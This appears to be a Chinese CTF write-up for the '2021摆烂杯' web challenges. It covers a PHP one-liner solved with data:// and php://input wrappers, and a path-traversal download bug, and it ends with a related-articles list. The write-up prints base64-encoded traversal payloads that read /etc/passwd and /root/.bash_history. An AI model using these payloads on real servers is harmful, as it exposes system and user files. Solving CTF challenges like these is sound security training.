【2021摆烂杯】web

简介: 【2021摆烂杯】web

web签到

php和python中都是用**来表示幂

请输入三个整数A、B、C,使得:
A³+B³+C³=114

这里整数解不出来,尝试用开三次方的方法绕过整数限制

(5)**3+(-1)**3+(-10**(1/3))**3=114.0

方法二

计算方式为A3+B3+C3=114

使用+0来绕过开头为0的判断

用括号来绕3次方

绕过我们A输入+114)+(0

B和C输入+0

整个式子就成了

(+114)+(0)**3+(+0)**3+(+0)**3 =114

一行代码

<?php
echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);

整理一下代码得到下面的逻辑

stripos($_GET['filename'],'.')===False
$_GET['id']=0
strlen($_GET['content'])>7
eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow")
substr($_GET['content'],0,1)=='w'===False
//可以用通配符.或者*绕过
file_get_contents($_GET['filename'],'r') == "welcome2ctfshow"

这里是一个三目运算符,条件为真时输出flag,由于开头有个!,因此所有条件需要为假才能输出flag

eregi()函数大小写不敏感,这里可以用W来绕过;

?id=0&content=W1111111111&filename=data://text/plain,welcome2ctfshow

也可以换成input伪协议

get:?id=0&content=W111111111&filename=php://input
post:welcome2ctfshow

登陆不了

看了一圈内容,发现问题出在验证码这里,创建新页面打开

/v/c?r=YzgxZTcyOC5qcGc=
c81e728.jpg

任意文件下载(读取)漏洞

这里jpg给的是相对路径,盲猜是和前缀路径拼凑,因此读取需要用…/进行穿越

../../../../../../../../../../../etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
成功回显出passwd

尝试确定中间件,先看历史命令记录(隐藏文件的.前缀)

一般是查看.bash_history或者是.zsh_history
不知道用户名可以~/用,查看root的需要root权限
../../../../../../../../../../../~/.bash_history发现没有回显
../../../../../../../../../../../root/.bash_history
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vcm9vdC8uYmFzaF9oaXN0b3J5
apache-tomcat-8.5.45
是java框架啊,不会,溜了

黑客网站

# @hint: flag不在这个服务器上,不用扫描,不用渗透
一直重复
tyro s4qw s3mm bubg jqje 46nc v35j aqjg eb3n qiuf 23ij oj4z wasx ohyd onion


目录
相关文章
|
缓存 Linux
centos7更换yum源 一条命令搞定
centos7更换yum源 一条命令搞定
2639 0
|
机器学习/深度学习 监控 算法
《C++ 实时视频流物体跟踪与行为分析全解析》
本文探讨了C++在实时视频流处理中的应用,涵盖物体跟踪和行为分析的关键技术。从视频读取与解码到特征提取、跟踪算法选择、数据关联及行为模型构建,详细介绍了技术要点和应用场景,如安防监控、智能交通和工业自动化。面对复杂环境,C++程序需不断优化以提高准确性和鲁棒性。
249 12
|
SQL 缓存 网络协议
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
本人深感网络安全实验有点麻烦,花了一个晚上弄了部分,特此将笔记贡献造福后人,个人能力有限,还会继续更新。。。 汇报题目:**15分钟教你用 Python 写一个 arpspoof**(课件准备ing,如果弄完后续补上) 第一次网络安全实验(密码学)也是我做的,这里先放个自制工具:[Java实现密码学工具,集成了对称加密算法DES,AES,IDEA,公开加密算法RSA,ECC,散列算法MD5,SHA1,CRC32,以及RSA,DSA,ECDSA数字签名验证示例。](https://blog.csdn.net/weixin_43734095/article/details/105303562)
1968 0
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
|
JavaScript 前端开发 IDE
程序员必知:WPSJSA宏编程(JS):1.初识
程序员必知:WPSJSA宏编程(JS):1.初识
1539 0
|
编解码 网络性能优化 网络协议
|
网络协议 网络安全 虚拟化
DNS服务器搭建(Windows版本)
DNS服务器搭建(Windows版本)
2463 0
|
SQL 网络协议 Linux
MSSQL不出网文件落地上线方式
MSSQL不出网文件落地上线方式
318 0
|
安全 Apache
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
影响版本 Apache 2.4.49 Apache 2.4.50 当前描述 发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。 环境搭建可以查看我的上一篇文章 https://developer.aliyun.com/article/11136
653 0
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
|
安全
CTF竞赛 -- 关于整数溢出
CTF竞赛 -- 关于整数溢出
566 0
|
JSON 安全 Android开发
渔人杯部分wp
渔人杯部分wp
239 0